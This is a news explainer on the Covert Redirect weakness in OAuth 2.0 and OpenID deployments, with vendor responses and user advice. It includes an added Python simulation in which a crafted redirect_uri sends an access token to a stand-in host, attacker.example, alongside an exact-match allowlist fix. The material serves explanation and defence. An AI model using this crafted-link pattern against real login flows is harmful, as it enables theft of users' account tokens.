







What is Covert Redirect?

Covert Redirect is a flaw in how many websites deploy the OAuth 2.0 and OpenID login protocols; it is not a bug in a piece of open-source software, and not in the protocols themselves. An attacker crafts a link to a genuine login page of an identity provider, so the popup the victim sees is served from the affected site's real domain (for example facebook.com). The request, however, names as its return address a third-party application whose domain the provider trusts, and that application forwards the browser, together with the login token it carries, on to a site the attacker controls.

What are OAuth and OpenID?

OAuth is an open standard for authorization. It lets users sign in or sign up for other services using an existing identity at a site such as Google, Facebook, Microsoft or Twitter. OpenID is a similar protocol, also used for single sign-on (SSO). Companies use these protocols so that users can sign in to many services without creating several new accounts. In both, once the user has authenticated at the identity provider, the provider redirects the browser back to a return URL supplied by the third-party application, carrying the token or code that proves the login. Covert Redirect abuses that redirect step.

Wang says that almost all the major sites are affected by this vulnerability, including Facebook, Google, Yahoo, LinkedIn, Microsoft and PayPal, among others. He reported the vulnerability to all of them, but the responses were not what he expected.

Responses to the reports:

Facebook:- The company said it "understood the risks associated with OAuth 2.0," and that "short of forcing every single application on the platform to use a whitelist," fixing this bug was "something that can't be accomplished in the short term."

Google:- Google says it has been tracking the issue.

LinkedIn:- The company said it would publish a blog post on the matter soon.

Microsoft:- Microsoft said an investigation had been done and that the vulnerability existed on the domain of a third party, not on its own sites.

Wang said:

"Patching this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist, then there would be no room for attacks. However, in the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable."

How To Prevent It?

Covert Redirect is not in the same class as Heartbleed, but it could affect a large number of users, and it is straightforward to exploit until the third-party applications involved are fixed. Fixing it is costly for those third parties, many of which lack the resources, yet it is the identity provider (such as Facebook) whose genuine login page makes the attack credible in the first place. The defence that both Wang and Facebook point to is a whitelist: the provider should redirect only to a return URL the application registered in advance, compared exactly rather than by domain, and the application itself must not host a page that forwards visitors to arbitrary URLs.
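The redirect flow described in the sections above, as an added example that is not part of the original article and is not Wang's or any provider's code. It models in Python both sides of the OAuth 2.0 implicit grant: the identity provider's decision on whether an incoming redirect_uri is acceptable, and a third-party application on a trusted domain that happens to host an open redirector. The hosts app.example and attacker.example, the client_id "app123", the registered callback URL and the token value are all constructed for the illustration. The loose domain-only check is the weakness; the exact-match allowlist is the fix (RFC 6749 section 3.1.2.2 asks providers to register and compare the complete redirection URI).

```python
"""Covert Redirect modelled end to end.

A loose redirect_uri check on the provider side plus an open redirector on
the third-party app's domain leaks the access token to the attacker; an
exact-match allowlist stops it.  Added example; hosts, client_id and token
are constructed, not taken from any real deployment.
"""
from typing import Callable, Optional
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Constructed registrations for a hypothetical relying party "app123".
# Loose: the provider remembers only the app's domain.
REGISTERED_DOMAINS = {"app123": "app.example"}
# Strict: the provider remembers the exact callback URL(s) and nothing else.
REGISTERED_REDIRECTS = {"app123": {"https://app.example/oauth/callback"}}

# Token the provider would issue (constructed; real tokens are random).
ISSUED_TOKEN = "AT-constructed-0001"


def loose_redirect_ok(client_id: str, redirect_uri: str) -> bool:
    """The weak check: any https URL on the registered domain is accepted."""
    parts = urlsplit(redirect_uri)
    domain = REGISTERED_DOMAINS.get(client_id)
    if domain is None or parts.scheme != "https":
        return False
    host = parts.hostname or ""
    return host == domain or host.endswith("." + domain)


def strict_redirect_ok(client_id: str, redirect_uri: str) -> bool:
    """The fix: exact string comparison against the registered allowlist."""
    return redirect_uri in REGISTERED_REDIRECTS.get(client_id, set())


def provider_authorize(query: str, check: Callable[[str, str], bool]) -> Optional[str]:
    """Model of the provider's /authorize endpoint after the user logged in.

    Returns the URL the browser is sent to, or None if the request is refused.
    With response_type=token the token travels in the URL fragment, which is
    how browser-based apps receive it in the implicit grant.
    """
    params = parse_qs(query, strict_parsing=True)
    client_id = params["client_id"][0]
    redirect_uri = params["redirect_uri"][0]
    if not check(client_id, redirect_uri):
        return None
    return redirect_uri + "#" + urlencode({"access_token": ISSUED_TOKEN})


def app_open_redirector(url: str) -> str:
    """Model of a vulnerable https://app.example/redirect?next=... handler.

    It answers with a 302 to whatever 'next' says.  Browsers carry the
    original URL's fragment over to a Location that has none (RFC 7231
    section 7.1.2), so the token follows the user to the next site.
    """
    parts = urlsplit(url)
    assert parts.hostname == "app.example" and parts.path == "/redirect"
    location = parse_qs(parts.query)["next"][0]
    if urlsplit(location).fragment == "":
        location = urlunsplit(urlsplit(location)._replace(fragment=parts.fragment))
    return location


def run_attack(check: Callable[[str, str], bool]) -> Optional[str]:
    """Full flow with the attacker's crafted link; returns where the token ends up."""
    crafted = urlencode({
        "client_id": "app123",
        "response_type": "token",
        # The return address is on the legitimate app's domain, so a
        # domain-only check passes it; the app then forwards to 'next'.
        "redirect_uri": "https://app.example/redirect?next=https://attacker.example/steal",
    })
    landing = provider_authorize(crafted, check)
    if landing is None:
        return None                      # provider refused the redirect_uri
    return app_open_redirector(landing)  # the app forwards, fragment and all


if __name__ == "__main__":
    print("loose check :", run_attack(loose_redirect_ok))
    print("strict check:", run_attack(strict_redirect_ok))
```

With the loose check the token lands on attacker.example in the fragment; with the exact-match allowlist the provider refuses the crafted redirect_uri before any token is issued. Note that the victim never sees anything suspicious at the login step itself, since the authorization page is the provider's own, which is exactly why the page's advice is to be wary of links that immediately demand a login.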

After Heartbleed, another widely reported flaw has surfaced, this time in the login tools OAuth and OpenID, which are used by many websites and tech titans including Google, Facebook, Microsoft and LinkedIn. Wang, a Ph.D student at Nanyang Technological University in Singapore, discovered the vulnerability, dubbed Covert Redirect; it can let phishing sites capture a user's login information.

Fortunately, Covert Redirect is not the next Heartbleed. In fact, from what we can ascertain, the Covert Redirect "flaw" is not even new: open redirectors combined with loosely validated return URLs have long been a known risk in sign-on flows. Moreover, classifying Covert Redirect as a vulnerability in OAuth 2.0 or OpenID is incorrect. These protocols are what companies use to let users sign in to multiple services with an existing identity instead of creating several new accounts, and the weakness lies in how individual third-party applications that use them validate where the user is sent back to, not in the protocols themselves.

The founder and interim CEO of WhiteHat Security, a website security firm, responded positively to Wang's finding and credited his work.

Users who want to avoid any loss of data should be cautious about links that immediately ask them to log in to Facebook or Google. Closing the tab immediately stops the redirection. To avoid handing information to a malicious site, only log in to Facebook or other services from sites you trust, and if a page looks off or asks for something unexpected, do nothing on it.